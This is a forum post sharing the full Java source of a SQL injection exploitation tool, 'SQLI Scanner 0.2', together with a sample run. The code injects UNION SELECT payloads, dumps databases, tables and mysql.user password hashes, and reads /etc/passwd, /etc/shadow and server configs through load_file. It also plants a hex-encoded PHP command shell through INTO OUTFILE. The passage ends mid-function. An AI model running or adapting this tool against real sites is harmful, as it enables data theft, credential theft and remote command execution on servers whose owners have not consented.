Posts - BigBear

#251
Java / [Java] SQLI Scanner 0.2
22 January 2013, 01:34 AM
Complete translation of this simple program for scanning pages vulnerable to SQLI, called k0bra, which I had originally written in Perl.

With the following options:

  • Check for the vulnerability
  • Find the number of columns
  • Automatically find the number that displays data
  • Show tables
  • Show columns
  • Show databases
  • Show tables from another DB
  • Show columns of a table from another DB
  • Show users from mysql.user
  • Search for files using load_file
  • Show a file using load_file
  • Show values
  • Show information about the DB
  • Create a shell using outfile
  • Everything is saved in organized logs

    A usage example:



    -- == SQLI Scanner 0.2 == --


    [+] Page :
    http://localhost/sql.php?id=

    [+] Checking ...

    [+] Scanning ...

    [Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
    [Limit] : The site has 3 columns
    [Data] : The number 1 print data

    -- == OPTIONS == --

    --== information_schema.tables ==--
    [1] : Show tables
    [2] : Show columns
    [3] : Show DBS
    [4] : Show tables with other DB
    [5] : Show columns with other DB
    --== mysql.user ==--
    [6] : Show users
    --== Others ==--
    [7] : Fuzzing files with load_file
    [8] : Read a file with load_file
    [9] : Dump
    [10] : Informacion of the server
    [11] : Create a shell with into outfile
    [12] : Show Log
    [13] : Exit

    [Option] :
    10

    [+] Searching informaion ...

    [+] DB Version : 5.5.20-log
    [+] DB Name : hackman
    [+] Username : root@localhost
    [+] information_schema : on
    [+] mysqluser : on
    [-] load_file : off

    [+] Finished





    The code is as follows:


    // -- == -- == -- == ---- ==
    // SQLI Scanner 0.2       ||
    // -- == -- == -- == ---- ==
    // (C) Doddy Hackman 2013 ||
    // -- == -- == -- == ---- ==

    import java.util.Scanner;
    import java.io.*;
    import java.net.*;

    import java.util.regex.Matcher;
    import java.util.regex.Pattern;

    public class Main {

        public static void main(String[] args) throws Exception {

            String target;
            Scanner host = new Scanner(System.in);

            installer();

            System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n");
            System.out.println("[+] Page : ");
            target = host.nextLine();
            scan(target);

    //schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
    //getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
    //getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
    //mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
    //fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
    //intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");

        }

        private static void manejo(String urla) throws Exception {

            while (true) {
                System.out.println("\n-- == OPTIONS == --\n");
                System.out.println("--== information_schema.tables ==--");
                System.out.println("[1] : Show tables");
                System.out.println("[2] : Show columns");
                System.out.println("[3] : Show DBS");
                System.out.println("[4] : Show tables with other DB");
                System.out.println("[5] : Show columns with other DB");
                System.out.println("--== mysql.user ==--");
                System.out.println("[6] : Show users");
                System.out.println("--== Others ==--");
                System.out.println("[7] : Fuzzing files with load_file");
                System.out.println("[8] : Read a file with load_file");
                System.out.println("[9] : Dump");
                System.out.println("[10] : Informacion of the server");
                System.out.println("[11] : Create a shell with into outfile");
                System.out.println("[12] : Show Log");
                System.out.println("[13] : Exit");

                int op;
                Scanner host = new Scanner(System.in);
                System.out.println("\n[Option] :");
                op = host.nextInt();

                if (op == 1) {
                    schematables(urla);
                    continuar();
                } else if (op == 2) {

                    String coler;

                    Scanner a = new Scanner(System.in);
                    System.out.println("\n[+] Table : ");
                    coler = a.nextLine();

                    schemacolumns(urla, coler);
                    continuar();

                } else if (op == 3) {
                    getdbs(urla);
                    continuar();
                } else if (op == 4) {

                    String tabler;

                    Scanner a = new Scanner(System.in);
                    System.out.println("\n[+] DB : ");
                    tabler = a.nextLine();

                    getablesbydb(urla, tabler);
                    continuar();

                } else if (op == 5) {

                    String dber;
                    String tablerx;

                    Scanner a = new Scanner(System.in);
                    System.out.println("\n[+] DB : ");
                    dber = a.nextLine();

                    System.out.println("\n[+] Table : ");
                    tablerx = a.nextLine();

                    getcolbydb(urla, dber, tablerx);
                    continuar();

                } else if (op == 6) {

                    mysqluser(urla);
                    continuar();

                } else if (op == 7) {

                    fuzzfiles(urla);
                    continuar();

                } else if (op == 8) {

                    String ar;

                    Scanner f = new Scanner(System.in);
                    System.out.println("\n[+] File : ");
                    ar = f.nextLine();

                    openfile(urla, ar);
                    continuar();

                } else if (op == 9) {

                    String a;
                    String b;
                    String c;

                    Scanner m = new Scanner(System.in);
                    System.out.println("\n[+] Table : ");
                    a = m.nextLine();

                    Scanner n = new Scanner(System.in);
                    System.out.println("\n[+] Column 1 : ");
                    b = n.nextLine();

                    Scanner l = new Scanner(System.in);
                    System.out.println("\n[+] Column 2 : ");
                    c = l.nextLine();

                    dumper(urla, a, b, c);

                    continuar();

                } else if (op == 10) {

                    details(urla);
                    continuar();

                } else if (op == 11) {

                    String b;
                    String c;

                    Scanner m = new Scanner(System.in);
                    System.out.println("\n[+] Full Path Discloure : ");
                    b = m.nextLine();

                    Scanner n = new Scanner(System.in);
                    System.out.println("\n[+] Directory to test : ");
                    c = n.nextLine();

                    intofile(urla, b, c);
                    continuar();

                } else if (op == 12) {

                    String ruta;

                    URL h = new URL(urla);

                    ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt";

                    System.out.println("\n[+] Check logs in : " + ruta);
                    continuar();

                } else if (op == 13) {
                    System.out.println("\n-- == (C) Doddy Hackman 2013 == --");
                    continuar();
                    System.exit(0);
                } else {
                    System.out.println("\n[-] Bad Option\n");
                    continuar();
                }

            }
        }

        private static void continuar() throws Exception {
            System.out.println("\n[+] Finished\n");
            Scanner chau = new Scanner(System.in);
            chau.nextLine();
        }

        private static void installer() throws Exception {

            File crear = new File("logs");

            if (!crear.isDirectory()) {
                crear.mkdirs();
            }

        }

        private static void intofile(String urla, String fpd, String dir) throws Exception {

            String linea;
            String lugar;
            String lugardos;
            String webtest;
            String web1;
            String formandoweb;
            String code;

            linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
            lugar = fpd + "/cmd.php";
            lugardos = dir + "/cmd.php";

            URL h = new URL(urla);

            System.out.println("\n[+] Checking ...\n");

            webtest = "http://" + h.getHost() + lugardos;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", linea);
            formandoweb = web1 + "+into+outfile+'" + lugar + "'--";

            code = toma(formandoweb);
            code = toma(webtest);

            uno = Pattern.compile("Mini Shell By Doddy");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[Shell UP] : " + webtest);
                savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
            } else {
                System.out.println("[-] Error");
            }

        }

        private static void openfile(String urla, String file) throws Exception {

            String archivo;
            String web1;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            archivo = encodehex(file);

            web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

            System.out.println("\n[+] Reading ...\n");

            code = toma(web1);

            uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {

                System.out.println("[+] File Found : " + file);
                System.out.println("\n[Source Start]\n");
                System.out.println(dos.group(1));
                System.out.println("\n[Source End]\n");

                savefile(urla, "\r\n" + "[+] File Found : " + file);
                savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                savefile(urla, dos.group(1));
                savefile(urla, "\r\n" + "[Source End]" + "\r\n");

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void fuzzfiles(String urla) throws Exception {

            String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", 
"/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", 
"/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", 
"C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"};
            String archivo;
            String web1;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            System.out.println("\n[+] Searching files with load_file() ....\n");

            for (int count = 0; count < archivos.length; count++) {

                archivo = encodehex(archivos[count]);

                web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

                code = toma(web1);

                uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
                dos = uno.matcher(code);

                if (dos.find()) {

                    System.out.println("[+] File Found : " + archivos[count]);
                    System.out.println("\n[Source Start]\n");
                    System.out.println(dos.group(1));
                    System.out.println("\n[Source End]\n");

                    savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
                    savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                    savefile(urla, dos.group(1));
                    savefile(urla, "\r\n" + "[Source End]" + "\r\n");

                }

            }

        }

        private static void dumper(String urla, String tabla, String col1, String col2) throws Exception {

            String web1;
            String web2;
            String code;
            int x;

            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");

            code = toma(web1 + "+from+" + tabla + "--");

            System.out.println("\n[+] Getting Values ...");

            uno = Pattern.compile("K0BRA(.*?)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Values Founds : " + dos.group(1));
                savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x < finals; x = x + 1) {

                    code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("\n[+] " + col1 + " : " + dos.group(1));
                        System.out.println("[+] " + col2 + " : " + dos.group(2));

                        savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
                        savefile(urla, "[+] " + col2 + " : " + dos.group(2));

                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void mysqluser(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;

            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");

            System.out.println("\n[+] Searching mysql.user ....");

            code = toma(web1 + "+from+mysql.user--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Users Found : " + dos.group(1));

                savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x < finals; x = x + 1) {

                    code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("\n[+] Host : " + dos.group(1));
                        System.out.println("[+] Username : " + dos.group(2));
                        System.out.println("[+] Password : " + dos.group(3));

                        savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
                        savefile(urla, "[+] Username : " + dos.group(2));
                        savefile(urla, "[+] Password : " + dos.group(3));

                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void getcolbydb(String urla, String db, String tab) throws Exception {

            String web1;
            String web2;
            String code;

            String dbf;
            String table;

            int x;

            Pattern uno = null;
            Matcher dos = null;

            dbf = encodehex(db);
            table = encodehex(tab);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

            System.out.println("\n[+] Getting Columns ....");

            code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x < finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Column Found : " + dos.group(1));
                        savefile(urla, "[+] Column Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }


        }

        private static void getablesbydb(String urla, String db) throws Exception {

            String web1;
            String web2;
            String code;
            String data;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            data = encodehex(db);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

            System.out.println("\n[+] Getting Tables ....");

            code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n");
                savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x < finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Table Found : " + dos.group(1));
                        savefile(urla, "[+] Table Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }


        }

        private static void getdbs(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");

            System.out.println("\n[+] Getting DBS ....");

            code = toma(web1 + "+from+information_schema.schemata--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x < finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] DB Found : " + dos.group(1));
                        savefile(urla, "[+] DB Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void schemacolumns(String urla, String nombre) throws Exception {

            String web1;
            String web2;
            String code;
            String tablexa;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            tablexa = encodehex(nombre);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

            System.out.println("\n[+] Getting columns ....");

            code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x < finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Column Found : " + dos.group(1));
                        savefile(urla, "[+] Column Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void schematables(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

            System.out.println("\n[+] Getting tables ....\n");

            code = toma(web1 + "+from+information_schema.tables--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] Tables Found : " + dos.group(1) + "\n");

                savefile(urla, "");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x < finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Table Found : " + dos.group(1));
                        savefile(urla, "[+] Table Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void scan(String urla) throws Exception {

            String codex;
            String target;

            Pattern uno = null;
            Matcher dos = null;

            target = urla;

            System.out.println("\n[+] Checking ...\n");

            codex = toma(target + "-1+union+select+666--");

            uno = Pattern.compile("The used SELECT statements have a different number of columns");
            dos = uno.matcher(codex);

            if (dos.find()) {
                System.out.println("[+] Scanning ...\n");

                int x;
                String urlfinal;
                String otrofinal;
                String code;
                String formariny;
                String otroformar;
                String link;

                urlfinal = "";
                formariny = "";

                for (x = 1; x <= 5; x = x + 1) {

    //urlfinal = urlfinal+x+",";
                    urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
                    formariny = formariny + x + ",";

                    otrofinal = urlfinal;
                    otroformar = formariny;

                    otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
                    otroformar = otroformar.substring(0, otroformar.length() - 1);

                    code = toma(target + "-1+union+select+" + otrofinal);

                    uno = Pattern.compile("RATSXPDOWN(\\d+)");
                    dos = uno.matcher(code);

                    if (dos.find()) {

                        otroformar = otroformar.replace(dos.group(1), "hackman");

                        link = target + "-1+union+select+" + otroformar;

                        System.out.println("[Target] : " + link);
                        System.out.println("[Limit] : The site has " + x + " columns");
                        System.out.println("[Data] : The number " + dos.group(1) + " print data");

                        savefile(link, "\r\n" + "[Target] : " + link);
                        savefile(link, "[Limit] : The site has " + x + " columns");
                        savefile(link, "[Data] : The number " + dos.group(1) + " print data");

                        manejo(link);

                        System.exit(1);

                    }

                }
                System.out.println("[-] Error");
            } else {
                System.out.println("[-] Not vulnerable");
            }

        }

        private static void details(String urla) throws Exception {

            String concat;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

            urla = urla.replace("hackman", concat);

            System.out.println("\n[+] Searching informaion ...\n");

            code = toma(urla);

            uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] DB Version : " + dos.group(1));
                System.out.println("[+] DB Name : " + dos.group(2));
                System.out.println("[+] Username : " + dos.group(3));

                savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
                savefile(urla, "[+] DB Name : " + dos.group(2));
                savefile(urla, "[+] Username : " + dos.group(3));

            } else {
                System.out.println("[-] Not found any data");
            }

            urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

            code = toma(urla + "+from+information_schema.tables--");
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] information_schema : on");
                savefile(urla, "[+] information_schema : on");
            } else {
                System.out.println("[-] information_schema : off");
            }

            code = toma(urla + "+from+mysql.user--");
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] mysqluser : on");
                savefile(urla, "[+] mysqluser : on");
            } else {
                System.out.println("[-] mysquser : off");
            }

            urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

            code = toma(urla);
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[-] load_file : on");
                savefile(urla, "[-] load_file : on");
            } else {
                System.out.println("[-] load_file : off");
            }

        }

        private static void savefile(String nombre, String texto) throws Exception {

            String formar;

            URL h = new URL(nombre);

            formar = "logs/" + h.getHost() + ".txt";

            FileWriter writer = new FileWriter(formar, true);
